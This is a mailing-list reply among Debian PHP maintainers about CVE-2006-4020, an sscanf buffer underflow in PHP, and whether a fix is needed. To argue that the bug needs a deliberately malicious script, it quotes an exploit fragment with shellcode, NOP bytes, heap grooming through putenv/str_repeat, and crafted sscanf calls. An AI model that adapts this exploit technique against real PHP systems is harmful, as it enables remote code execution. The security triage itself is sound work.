[php-maint] Re: another batch of php security issues for review

[Martin Schulze]

Moritz Muehlenhoff wrote:
> Martin Schulze wrote:
> > > CVE-2006-4020 (scanf.c in PHP 5.1.4 and earlier, and 4.4.3 and earlier,
> > > allows ...)
> > > 
> > > 	"buffer underflow" could lead to code execution, though it 
> > > 	isn't clear exactly how exploitable it is.  according to the
> > > 	patch:
> > > 
> > > 	http://bugs.php.net/bug.php?id=38322
> > > 
> > > 	looks like an off-by-one type error, with a simple enough fix, 
> > > 	anyway.
> > 
> > No, this is a non-issue.  It requires a malicious PHP script to work.
> > The attacker could just use popen(), system() or any other means PHP
> > offers.
> 
> We should fix this, it can be leveraged into code injection and there
> seem to be applications, which use it in a vulnerable manner.
> Also, the patch is easy to review and self-contained.

Please explain which application that is not written to exploit
this or another PHP bug contains PHP code like the following:

$object_zval = $eip_hop_over.$ptr_to_obj_handlers.$eip_hop_over.
               "\x05\x01\x90\x90".$shellcode."\xC3\x90\x90\x20";

$str = str_repeat($ptr_to_ptr_to_zval,20);
unset($str);

sscanf(
$object_zval,
'%1$s',
$str);

putenv("PHP_foo=".str_repeat($ptr_to_zval,64));
putenv("PHP_foo=");

sscanf(
"a ",
'%1$s',
$str);


It's not as if sscanf( "a ", '%1$s', $str); per se opens a remote
code execution vulnerability, there are factors that also need
to be included - and they are only included if the PHP script is
written to exploit this one specifically.

Regards,

	Joey

-- 
If you come from outside of Finland, you live in wrong country.
	-- motd of irc.funet.fi